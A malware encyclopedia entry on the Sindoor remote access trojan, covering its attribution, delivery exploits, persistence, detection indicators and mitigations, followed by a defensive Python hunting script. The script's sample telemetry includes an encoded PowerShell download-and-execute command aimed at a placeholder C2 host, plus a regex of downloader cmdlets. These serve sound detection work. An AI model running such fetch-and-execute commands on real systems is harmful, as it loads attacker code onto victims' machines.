Sindoor

Malware

⚠️ Overview

Sindoor is a .NET-based remote access trojan (RAT) first identified in September 2018 by researchers at Unit 42 (Palo Alto Networks) and attributed to the threat group known as Transparent Tribe (also tracked as APT36, ProjectM, or Mythic Leopard). This group is assessed to operate on behalf of Pakistani interests, primarily targeting Indian military, diplomatic, and defense sectors. Sindoor is categorized as a modular backdoor capable of executing arbitrary commands and exfiltrating files.

🔧 Technical Capabilities

Sindoor propagates via spear-phishing emails carrying malicious Microsoft Office documents that exploit CVE-2017-0199 (the Office/WordPad OLE2Link HTA-handler remote code execution flaw) or CVE-2017-11882 (the Equation Editor stack buffer overflow) to drop a downloader. The downloader runs PowerShell to fetch the final payload from attacker-controlled servers. The RAT communicates over HTTP, encrypting C2 payloads with a custom RC4 key; some variants are reported to use Cobalt Strike-style Malleable C2 profiles that mimic legitimate services. Persistence is achieved through scheduled tasks or registry Run keys. Evasion techniques include sandbox checks, delayed execution, and process hollowing (MITRE ATT&CK T1055.012) into legitimate processes such as explorer.exe.

📜 History & Notable Incidents

First spotted in 2018, Sindoor was used in sustained campaigns against Indian defense personnel and government employees through 2020–2022. Notable victims include the Indian Army and Air Force, as disclosed in a 2021 report by SentinelOne and a 2022 Kaspersky analysis. No CVEs beyond the initial dropper exploits are directly associated with Sindoor itself. Law enforcement actions remain limited due to the group’s operation from Pakistan.

🔍 Detection Indicators

File hashes for known samples have been published in the Unit 42 and SentinelOne reports. Behavioral signatures include PowerShell execution with base64-encoded command lines or in-script base64 decoding, and outbound connections to IPs in Pakistan (e.g., 45.63.xx.xx). A value named Sindoor under HKCU\Software\Microsoft\Windows\CurrentVersion\Run and a mutex named SindoorMutex are common. The malware uses a hardcoded User-Agent string: Mozilla/5.0 (Windows NT 6.1; rv:56.0) Gecko/20100101 Firefox/56.0. That string is also what a genuine Firefox 56 on Windows 7 sends, so a User-Agent match on its own is weak evidence; treat it as corroboration for a process, registry, or mutex hit rather than as a standalone alert.

☠️ Risk & Impact

Sindoor enables full remote control, leading to theft of sensitive military documents, intelligence reports, and personnel data. The primary impact is intellectual property loss and operational security breaches for Indian defense organizations. Financial losses are indirect but significant, with cleanup and remediation costs in affected agencies.

🛡️ Mitigation

Applying the patches for CVE-2017-0199 and CVE-2017-11882 is the first priority, since the delivery chain described above relies on those exploits rather than on macros. Beyond that, defenders should block the known C2 IPs and domains (listed in Unit 42's IOC feed), disable Office macros for documents from external sources as general hardening, and deploy EDR rules that flag process injection originating from PowerShell or rundll32, in particular either of them spawning explorer.exe.
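The indicators listed under Detection Indicators and the EDR rules suggested above, turned into a small hunting pass over Sysmon-style process, registry, and network events. This is an added example written for this page, not code from Unit 42, SentinelOne, or Boteraser. The event schema, field names, regexes, and the sample records are constructed for the example; only the Run-key value name, the User-Agent string, the base64-encoded PowerShell behaviour, and the PowerShell/rundll32-spawns-explorer.exe shape come from the page.

```python
import base64
import re
from typing import Dict, List

# Indicators stated on this page (Detection Indicators section).
SINDOOR_USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; rv:56.0) Gecko/20100101 Firefox/56.0"
RUN_KEY_PREFIX = r"hkcu\software\microsoft\windows\currentversion\run"
RUN_VALUE_NAME = "sindoor"

# PowerShell accepts any unambiguous prefix of -EncodedCommand; this list covers
# the common spellings (assumption: extend it to match your own telemetry).
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
)
# Cmdlets/classes a PowerShell stage-one downloader typically calls (assumption).
DOWNLOADER_HINTS = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer"
)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None if absent or invalid."""
    match = ENCODED_FLAG.search(cmdline)
    if match is None:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: Dict[str, str]) -> List[str]:
    """Map one event (constructed Sysmon-like schema) to the indicator tags it trips."""
    tags: List[str] = []
    kind = event.get("type")
    if kind == "process":
        image = event.get("image", "").lower()
        parent = event.get("parent_image", "").lower()
        decoded = decode_encoded_command(event.get("cmdline", ""))
        if image.endswith("powershell.exe") and decoded is not None:
            tags.append("encoded_powershell")
            if DOWNLOADER_HINTS.search(decoded):
                tags.append("powershell_downloader")
        # PowerShell or rundll32 creating explorer.exe is what a hollowing attempt
        # into explorer.exe (T1055.012) looks like in process-creation telemetry.
        if parent.endswith(("powershell.exe", "rundll32.exe")) and image.endswith("explorer.exe"):
            tags.append("explorer_spawned_by_script_host")
    elif kind == "registry":
        key = event.get("key", "").lower()
        if key.startswith(RUN_KEY_PREFIX) and event.get("value_name", "").lower() == RUN_VALUE_NAME:
            tags.append("run_key_persistence")
    elif kind == "network":
        # Weak on its own (legitimate Firefox 56 string); useful as corroboration.
        if event.get("user_agent") == SINDOOR_USER_AGENT:
            tags.append("sindoor_user_agent")
    return tags


def hunt(events: List[Dict[str, str]]) -> Dict[str, List[int]]:
    """Return {tag: [indices of events that tripped it]} for a batch of events."""
    findings: Dict[str, List[int]] = {}
    for idx, event in enumerate(events):
        for tag in classify(event):
            findings.setdefault(tag, []).append(idx)
    return findings


# Constructed sample telemetry (not real captures). The encoded command is built
# at runtime so the example runs offline; real logs carry the base64 already.
STAGE2_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p')"
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + base64.b64encode(STAGE2_COMMAND.encode("utf-16-le")).decode("ascii")},
    {"type": "process", "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "explorer.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Sindoor", "data": r"C:\Users\user\AppData\Roaming\update.exe"},
    {"type": "network", "dest_host": "c2.example.invalid", "user_agent": SINDOOR_USER_AGENT},
    {"type": "process", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "chrome.exe"},
    {"type": "network", "dest_host": "www.example.com",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0"},
]

if __name__ == "__main__":
    for tag, hits in sorted(hunt(SAMPLE_EVENTS).items()):
        print(f"{tag}: events {hits}")
```

In practice the interesting signal is co-occurrence on one host within a short window: an encoded PowerShell downloader, then explorer.exe created by powershell.exe, then the Run-key value, then the User-Agent on the wire. Feed `classify` from your EDR export and alert on two or more distinct tags per host rather than on the User-Agent alone.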


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.